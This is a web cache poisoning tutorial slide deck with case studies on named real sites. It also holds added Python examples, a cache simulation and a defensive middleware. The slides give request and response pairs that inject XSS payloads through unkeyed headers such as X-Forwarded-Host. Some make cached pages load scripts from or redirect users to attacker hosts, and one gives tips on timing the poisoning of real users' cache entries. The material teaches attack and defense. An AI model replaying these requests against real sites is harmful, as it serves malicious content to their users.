Web Cache Poisoning
- Kuldeep Pandya
About Me
● A neophyte
● Web enthusiast
● I am not yet working, I am still studying (◕‿◕)
Overview
● Which cache poisoning are we talking about?
● A quick recap of caching
● Case Studies
● Practical Time
● Defense
Web Cache Poisoning at a glance
Web Cache Poisoning is NOT
● Web Cache Deception
● Browser Cache Poisoning
● Request Smuggling
● Response Splitting
● DNS Cache Poisoning
How response caching works
Web Cache Poisoning
Cache Keys
GET /bootstrap.css HTTP/1.1
Host: example.com
User-Agent: Chrome/71.0….Linux/4.15
Blah: …
● The cache key is what uniquely identifies a cached object. It is usually built from the request line (method and path, query string included) and the Host header; other headers, such as the User-Agent above, are normally left out of it.
Unkeyed Inputs and key collision
GET /some_page.html HTTP/1.1
Host: example.com
User-Agent: Chrome/71.0….
Blah: …
Cookie: language=english
Blah: ..
GET /some_page.html HTTP/1.1
Host: example.com
User-Agent: Chrome/71.0….
Blah: …
Cookie: language=hindi
Blah: ..
Request:
GET /page.html HTTP/1.1
Host: example.com
Blah: …
Cookie: language=english
Response:
Blah…
<title>Hello World</title>
Blah...
Request:
GET /page.html HTTP/1.1
Host: example.com
Blah: …
Cookie: language=hindi
Response:
Blah…
<title>नमस्ते दुनिया</title>
Blah...
Request:
GET /page.html HTTP/1.1
Host: example.com
Blah: …
Cookie: language=english
Response:
Blah…
<title>Hello World</title>
Blah...
Request:
GET /page.html HTTP/1.1
Host: example.com
Blah: …
Cookie: language=hindi
Cached Response (the cookie is not part of the key, so the request for the Hindi page collides with the stored English one):
Blah…
<title>Hello World</title>
Blah...
How do we poison caches?
● Using unkeyed inputs like HTTP Headers
● Using Request Smuggling
● Using Response Splitting
➔ This presentation focuses on exploitation through unkeyed HTTP headers
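To make the key collision on the previous slides concrete, here is an added example (not code from the slides): a toy shared cache in Python in front of an origin that builds an absolute URL from X-Forwarded-Host, which is the bug the later slides exploit. The cache, the origin, the hostnames and the payload are all constructed for this demonstration; nothing touches the network.

```python
# Added example (not from the slides): a toy shared cache in front of an origin
# that trusts X-Forwarded-Host, showing why an unkeyed header lets one attacker
# request overwrite the entry every other user receives.
from dataclasses import dataclass, field
from typing import Dict, Tuple


@dataclass
class Request:
    path: str                                   # request-target, query string included
    headers: Dict[str, str] = field(default_factory=dict)

    def header(self, name: str, default: str = "") -> str:
        # Header names are case-insensitive; match them that way.
        for k, v in self.headers.items():
            if k.lower() == name.lower():
                return v
        return default


def vulnerable_origin(req: Request) -> str:
    """Origin that prefers X-Forwarded-Host over Host when building an absolute
    URL (the bug on the 'funny request' slide) and reflects it unescaped."""
    host = req.header("X-Forwarded-Host") or req.header("Host")
    return f'<img src="https://{host}/image.png" />'


class SharedCache:
    def __init__(self, keyed: Tuple[str, ...] = ("Host",),
                 strip: Tuple[str, ...] = ()):
        self.keyed = keyed      # headers that take part in the cache key
        self.strip = strip      # headers the edge removes before calling the origin
        self.store: Dict[tuple, str] = {}
        self.hits = 0

    def key(self, req: Request) -> tuple:
        # Only the path and the keyed headers identify an entry; anything
        # else in the request is 'unkeyed' and invisible to the lookup.
        return (req.path,) + tuple(req.header(h) for h in self.keyed)

    def fetch(self, req: Request) -> str:
        k = self.key(req)
        if k in self.store:
            self.hits += 1
            return self.store[k]
        stripped = {s.lower() for s in self.strip}
        forwarded = Request(req.path, {h: v for h, v in req.headers.items()
                                       if h.lower() not in stripped})
        body = vulnerable_origin(forwarded)
        self.store[k] = body
        return body


PAYLOAD = 'lol"/><svg onload=alert(1)>'   # constructed payload, as on the slide


def run_scenario(keyed=("Host",), strip=()) -> Tuple[str, int]:
    """Attacker sends one request with the payload header, then a victim asks
    for the same page without it. Returns the victim's body and the number of
    cache hits (1 means the victim was served the stored response)."""
    cache = SharedCache(keyed, strip)
    attacker = Request("/login.php", {"Host": "example.com",
                                      "X-Forwarded-Host": PAYLOAD})
    victim = Request("/login.php", {"Host": "example.com"})
    cache.fetch(attacker)            # MISS: origin builds the URL from the payload
    body = cache.fetch(victim)       # HIT on that entry when the header is unkeyed
    return body, cache.hits


if __name__ == "__main__":
    for label, kw in [("unkeyed header (vulnerable)", {}),
                      ("header added to the key", {"keyed": ("Host", "X-Forwarded-Host")}),
                      ("header stripped at the edge", {"strip": ("X-Forwarded-Host",)})]:
        body, hits = run_scenario(**kw)
        print(f"{label}: hits={hits} body={body}")
```

In the first run the victim gets the attacker's markup straight from the cache. Adding the header to the key removes the collision (this is what a `Vary` header does for the named request header), but it also lets an attacker create one cache entry per header value; stripping untrusted forwarding headers at the edge before the request reaches the origin is the cleaner fix.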
Approach to web cache poisoning
● Find unkeyed inputs (headers the origin reads but the cache ignores)
● Elicit a harmful response from the origin using that input
● Get that response cached, so the cache serves it to other users
Quick Example On Web Cache Poisoning
A normal request
Request:
GET /login.php HTTP/1.1
Host: 192.168.56.101
Blah: …
Response:
Blah: ...
<img src="192.168.56.101/image.png" />
Blah...
A funny request
Request:
GET /login.php HTTP/1.1
Host: 192.168.56.101
X-Forwarded-Host: lol"/><svg onload='alert(1)'>
Blah: ...
Response:
Blah: …
<img src="lol"/><svg onload='alert(1)'>/image.png" />
We all like practicals, don't we?
Case Studies
Cached XSSed Response in redhat.com
GET /en?dontpoisoneveryone=1 HTTP/1.1
Host: www.redhat.com
X-Forwarded-Host: a."><script>alert(1)</script>
HTTP/1.1 200 OK
Cache-Control: public, no-cache
Blah…
<meta property="og:image"
content="https://a."><script>alert(1)</script>"/>
Discreet Poisoning
● The query string is part of the cache key, so adding ?dontpoisoneveryone=1 (a cache buster) poisons only the entry for https://www.redhat.com/en?dontpoisoneveryone=1, not the page every user requests. Use a buster like this while testing.
● Note that the response above carried Cache-Control: public, no-cache and was cached anyway: cache headers say what the origin asks for, not what the CDN does.
● To poison the entry real users hit, we drop the buster and have to be the first request the cache forwards to the origin after the current entry expires.
● That means working out when the cached object expires: read the Age and Cache-Control headers on the responses, and check the CDN's documentation for its default TTLs where the origin sends none.
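Working out the expiry comes down to two numbers the response itself carries: Age (how long the entry has already been held) and the lifetime from Cache-Control (or Expires). The following is an added example, not code from the slides, that does the RFC 7234 freshness arithmetic for a shared cache and checks whether a response was a cache hit. The sample headers are constructed from the responses shown on the unity3d.com, redhat.com and catalog.data.gov slides plus made-up ones; the function names are the example's own.

```python
# Added example (not from the slides): estimate how long a shared cache will keep
# serving the current entry, by the response's own account, and detect cache hits.
from email.utils import parsedate_to_datetime
from typing import Dict, Optional


def parse_cache_control(value: str) -> Dict[str, Optional[str]]:
    """'public, max-age=1800' -> {'public': None, 'max-age': '1800'}"""
    directives: Dict[str, Optional[str]] = {}
    for part in value.split(","):
        part = part.strip()
        if not part:
            continue
        name, _, arg = part.partition("=")
        directives[name.strip().lower()] = arg.strip().strip('"') or None
    return directives


def shared_cache_ttl(headers: Dict[str, str]) -> Optional[int]:
    """Seconds of freshness left for a *shared* cache, per RFC 7234: s-maxage
    beats max-age, both beat Expires, and Age is what has already elapsed.
    None means the headers give no explicit lifetime or forbid storing the
    response; it does not prove the CDN is not caching it."""
    h = {k.lower(): v for k, v in headers.items()}
    cc = parse_cache_control(h.get("cache-control", ""))
    if "no-store" in cc or "private" in cc:
        return None
    try:
        age = int(h.get("age", "0"))
    except ValueError:
        age = 0
    for directive in ("s-maxage", "max-age"):
        if cc.get(directive) is not None:
            try:
                return max(int(cc[directive]) - age, 0)
            except ValueError:
                continue
    if "expires" in h and "date" in h:
        try:
            lifetime = parsedate_to_datetime(h["expires"]) - parsedate_to_datetime(h["date"])
        except (TypeError, ValueError):
            return None
        return max(int(lifetime.total_seconds()) - age, 0)
    return None


def served_from_cache(headers: Dict[str, str]) -> bool:
    """Empirical check: the CDN's own hit marker, or a non-zero Age."""
    h = {k.lower(): v.lower() for k, v in headers.items()}
    for name in ("x-cache", "cf-cache-status", "x-cache-status"):
        if "hit" in h.get(name, ""):
            return True
    try:
        return int(h.get("age", "0")) > 0
    except ValueError:
        return False


# Constructed samples, taken from the response headers shown on the slides.
UNITY = {"Via": "1.1 varnish-v4", "Age": "174", "Cache-Control": "public, max-age=1800"}
REDHAT = {"Cache-Control": "public, no-cache"}
DATAGOV = {"Age": "32707", "X-Cache": "Hit from cloudfront"}
# Constructed sample for the Expires fallback (no Cache-Control lifetime at all).
EXPIRES_ONLY = {"Date": "Sun, 06 Nov 1994 08:49:37 GMT",
                "Expires": "Sun, 06 Nov 1994 09:49:37 GMT", "Age": "600"}

if __name__ == "__main__":
    for label, hdrs in [("unity3d", UNITY), ("redhat", REDHAT),
                        ("data.gov", DATAGOV), ("expires", EXPIRES_ONLY)]:
        print(f"{label}: ttl={shared_cache_ttl(hdrs)} hit={served_from_cache(hdrs)}")
```

For the unity3d.com response this gives 1800 - 174 = 1626 seconds before the poisoned entry is refetched. For the redhat.com response it gives None, which is exactly the case the slide warns about: the headers promise nothing, yet the page was served from cache, so the observation (a second request returning the poisoned body, a hit marker, a growing Age) is what to trust, and the CDN's default TTL is what to look up.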
unity3d.com
Request:
GET / HTTP/1.1
Host: unity3d.com
X-Host: portswigger-labs.net
HTTP/1.1 200 OK
Via: 1.1 varnish-v4
Age: 174
Cache-Control: public, max-age=1800
…
<script src="https://portswigger-labs.net/sites/files/foo.js"></script>
Selective Poisoning
GET / HTTP/1.1
Host: redacted.com
User-Agent: Mozilla/5.0 … Firefox/60.0
X-Forwarded-Host: a"><iframe onload=alert(1)>
HTTP/1.1 200 OK
X-Served-By: cache-lhr6335-LHR
Vary: User-Agent, Accept-Encoding
…
<link rel="canonical" href="https://a">a<iframe onload=alert(1)>
</iframe>
● Vary: User-Agent puts the User-Agent into the cache key, so this poisoned entry is served only to clients sending exactly this User-Agent string. That makes the attack selective: pick a target's browser version (or a crawler) and nobody else sees the payload.
DOM Poisoning
● Here the header is not reflected into script directly but into a data attribute that the page's JavaScript uses as the base URL for further requests. Control the base URL and you control the data those requests return.
Request:
GET /dataset HTTP/1.1
Host: catalog.data.gov
X-Forwarded-Host: canary
Response:
HTTP/1.1 200 OK
Age: 32707
X-Cache: Hit from cloudfront
…
<body data-site-root="https://canary/">
Request:
GET /dataset HTTP/1.1
Host: catalog.data.gov
X-Forwarded-Host: id.burpcollaborator.net
Response:
HTTP/1.1 200 OK
Age: 32707
X-Cache: Hit from cloudfront
…
<body data-site-root="https://id.burpcollaborator.net/">
Request:
GET /api/i18n/es HTTP/1.1
Host: catalog.data.gov
Response:
HTTP/1.1 200 OK
…
{"Show more":"Mostrar más"}
Request (to the attacker's host, which serves a replacement translation file that the poisoned page now loads instead):
GET /api/i18n/es HTTP/1.1
Host: portswigger-labs.net
Response:
HTTP/1.1 200 OK
…
{"Show more":"<svg onload=alert(1)>"}
Mozilla SHIELD
● A feature that installs add-ons in the background, used for marketing purposes among others
● It became famous when it force-installed the Mr. Robot extension in the background
● Nginx was used for caching
● Firefox's SHIELD client sent an odd request in which the Origin header was all lowercase
GET /api/v1/recipe/signed/ HTTP/1.1
Blah: ...
origin: null
Blah: ...
Request:
GET /api/v1/ HTTP/1.1
Host: normandy.cdn.mozilla.net
X-Forwarded-Host: xyz.burpcollaborator.net
HTTP/1.1 200 OK
{
...
"recipe-list": "https://xyz.burpcollaborator.net/api/v1/recipe/",
"recipe-signed": "https://xyz.burpcollaborator.net/api/v1/recipe/signed/",
...
}
● Recipes were signed, so we couldn't install an add-on of our choice
● Backend Mozilla systems that use unsigned recipes would let us peek into the system, and might help in obtaining the signing key
● But we could still perform a DDoS
● We could still install already-signed add-ons (old signed recipes can be replayed)
Route Poisoning in goodhire.com
● Some applications use request headers to generate URLs and then route on those URLs :)
● goodhire.com is hosted on HubSpot, which fronts it with Cloudflare's cache.
Route Poisoning in goodhire.com
Request:
GET / HTTP/1.1
Host: www.goodhire.com
X-Forwarded-Server: canary
Response:
HTTP/1.1 404 Not Found
CF-Cache-Status: MISS
...
<title>HubSpot - Page not found</title>
<p>The domain canary does not exist in our system.</p>
Request:
GET / HTTP/1.1
Host: www.goodhire.com
X-Forwarded-Host: portswigger-labs-4223616.hs-sites.com
Response:
HTTP/1.1 200 OK
...
<script>alert(document.domain)</script>
Hidden route poisoning
● This vulnerability was in blog.cloudflare.com, which is fronted by Cloudflare's own cache
● blog.cloudflare.com is hosted on Ghost.
A normal failure response
Request:
GET / HTTP/1.1
Host: blog.cloudflare.com
X-Forwarded-Host: canary
Response:
HTTP/1.1 302 Found
Location: https://ghost.org/fail/
Supplying an already hosted website
Request:
GET / HTTP/1.1
Host: blog.cloudflare.com
X-Forwarded-Host: blog.binary.com
Response:
HTTP/1.1 200 OK
Normal response
Still No Luck :(
But what if we supply a website that is itself hosted on Ghost?
Request:
GET / HTTP/1.1
Host: blog.cloudflare.com
X-Forwarded-Host: noshandnibble.ghost.io
Response:
HTTP/1.1 302 Found
Location: http://noshandnibble.blog/
How much damage can we do with it?
● The cached 302 sends every request for a cached resource on blog.cloudflare.com to a domain the attacker controls (a blog registered on Ghost with its own custom domain). The files that were cached, and so could be redirected this way:
a. jpg
b. png
c. pdf
d. js
e. css
Bypassing mixed-content protection
● Mixed content is when an HTTPS page requests a resource over plain HTTP.
● Browsers block such loads; the feature is called mixed-content blocking.
● The redirect Ghost issued pointed to http:// rather than https://, which was a big obstacle.
Again stuck :/
Luckily, bounty hunters helped
● In Safari, HSTS upgrades the redirect target to HTTPS automatically.
● HSTS (HTTP Strict Transport Security) is a response header by which a site tells the browser to use only HTTPS for that host from then on; the browser rewrites http:// URLs for that host to https:// before connecting, so the request is never sent in the clear.
● Edge's handling of the 302 response completely bypasses mixed-content protection.
Chaining unkeyed inputs
● Sometimes an unkeyed input only affects one part of the application.
● We then need to chain unkeyed inputs to get something useful.
Request:
GET /en HTTP/1.1
Host: redacted.net
X-Forwarded-Host: xyz
Response:
HTTP/1.1 200 OK
Set-Cookie: locale=en; domain=xyz
Request 1
Request:
GET /en HTTP/1.1
Host: redacted.net
X-Forwarded-Scheme: nothttps
Response:
HTTP/1.1 301 Moved Permanently
Location: https://redacted.net/en
Request 2
Request 1 + Request 2 = Web Cache Poisoning (the scheme header makes the origin redirect, X-Forwarded-Host decides where to, and once the 301 is cached every visitor to /en is sent to attacker.com)
Request:
GET /en HTTP/1.1
Host: redacted.net
X-Forwarded-Host: attacker.com
X-Forwarded-Scheme: nothttps
Response:
HTTP/1.1 301 Moved Permanently
Location: https://attacker.com/en
Open Graph Hijacking
● Here's everyone's favourite, Facebook hacking!
● Open Graph is a set of <meta> tags defined by Facebook; when a page is shared, Facebook (and other sites) read these tags to decide the preview's title, image and canonical URL.
● But what if we poison the cache with a page whose og:url points where we want, so that sharing it shares our content instead? Let's try it out.
Request:
GET /en HTTP/1.1
Host: redacted.net
X-Forwarded-Host: attacker.com
Response:
HTTP/1.1 200 OK
Cache-Control: max-age=0, private, must-revalidate
…
<meta property="og:url" content='https://attacker.com/en'/>
● Note the Cache-Control: it tells caches not to store this response, yet the attack works, so the cache in front of this site was not honouring it. Cache directives describe what the origin asks for; whether the CDN is actually caching is something to confirm by observation (a second request returning the poisoned body, a hit marker, or a growing Age header).
Time for practicals!!!
Defense
● Do NOT use caching at all! (or restrict it to purely static responses)
● Avoid taking input from headers (and cookies); if the application needs to know its own hostname or scheme, configure them.
● If you must, then include those headers in the cache key, or strip them at the cache before the request reaches the origin.
● Use Burp's active scanner or a tool like Param Miner to find unkeyed inputs.
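An added example, not from the slides or from any of the platforms they mention: a WSGI middleware in Python that applies the "avoid taking input from headers" advice at the origin. It assumes the application is deployed behind one known proxy or CDN whose address ranges are configured (10.0.0.0/8 below is a placeholder), that the allowed Host values are configured, and that the public hostname used in generated URLs is configured rather than read from the request. All names and hostnames are the example's own.

```python
# Added example (not from the slides): origin-side handling of forwarding headers.
# Assumes one trusted proxy/CDN with configured address ranges and a configured
# public hostname; hostnames and ranges below are placeholders.
import ipaddress
from typing import Iterable, List, Tuple

# Headers proxies use to describe the original request. Any of these arriving
# from a peer that is not the configured proxy is attacker input, not routing data.
FORWARDING_HEADERS = ("HTTP_X_FORWARDED_HOST", "HTTP_X_FORWARDED_SERVER",
                      "HTTP_X_FORWARDED_SCHEME", "HTTP_X_FORWARDED_PROTO",
                      "HTTP_X_HOST", "HTTP_X_ORIGINAL_URL", "HTTP_FORWARDED")


class ForwardedHeaderFilter:
    def __init__(self, app, trusted_proxies: Iterable[str],
                 allowed_hosts: Iterable[str], public_host: str):
        self.app = app
        self.trusted = [ipaddress.ip_network(p) for p in trusted_proxies]
        self.allowed_hosts = {h.lower() for h in allowed_hosts}
        self.public_host = public_host

    def _peer_is_trusted(self, environ) -> bool:
        try:
            peer = ipaddress.ip_address(environ.get("REMOTE_ADDR", ""))
        except ValueError:
            return False
        return any(peer in net for net in self.trusted)

    def __call__(self, environ, start_response):
        # 1. Host is keyed by caches, but an unexpected value still means someone
        #    is steering URL generation; refuse it. (Port stripped naively here;
        #    bracketed IPv6 literals would need more care.)
        host = environ.get("HTTP_HOST", "").split(":")[0].lower()
        if host not in self.allowed_hosts:
            start_response("400 Bad Request", [("Content-Type", "text/plain")])
            return [b"bad host\n"]
        # 2. Forwarding headers are honoured only when the configured proxy set them.
        if not self._peer_is_trusted(environ):
            for name in FORWARDING_HEADERS:
                environ.pop(name, None)
        # 3. Whatever survived, absolute URLs are built from configuration.
        environ["app.public_host"] = self.public_host
        return self.app(environ, start_response)


def absolute_url(environ, path: str) -> str:
    """URL generation that never consults Host or X-Forwarded-*."""
    return f"https://{environ['app.public_host']}{path}"


def demo_app(environ, start_response):
    """The page that, on the slides, built its <img> URL from X-Forwarded-Host."""
    start_response("200 OK", [("Content-Type", "text/html"),
                              ("Cache-Control", "public, max-age=60")])
    body = f'<img src="{absolute_url(environ, "/image.png")}" />\n'
    return [body.encode()]


app = ForwardedHeaderFilter(demo_app, trusted_proxies=["10.0.0.0/8"],
                            allowed_hosts=["example.com"], public_host="example.com")


def call(environ) -> Tuple[str, str]:
    """Drive the wrapped app in-process and return (status, body)."""
    captured: List[str] = []

    def start_response(status, headers, exc_info=None):
        captured.append(status)

    body = b"".join(app(environ, start_response)).decode()
    return captured[0], body


if __name__ == "__main__":
    # Constructed environ: an untrusted peer sending the poisoning header.
    env = {"REMOTE_ADDR": "203.0.113.5", "HTTP_HOST": "example.com",
           "HTTP_X_FORWARDED_HOST": 'lol"/><svg onload=alert(1)>'}
    print(call(env))
```

Two caveats. First, this only protects the origin: where the platform or CDN itself routes on X-Forwarded-Host, as in the HubSpot and Ghost cases above, the fix has to be made there. Second, the cache side is separate: the same headers should be stripped at the edge before the request is forwarded, or added to the cache key (which is what Vary does), so that a request carrying them can never be stored under the key ordinary requests use.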
Thanks
● Connect with me
○ kuldeep.pandya.77799@Facebook
○ some_dank_boi@Instagram
○ Predator77799@Twitter
Credits
James Kettle
albinowax@Twitter
References:
https://portswigger.net/blog/practical-web-cache-poisoning
https://youtu.be/j2RrmNxJZ5c
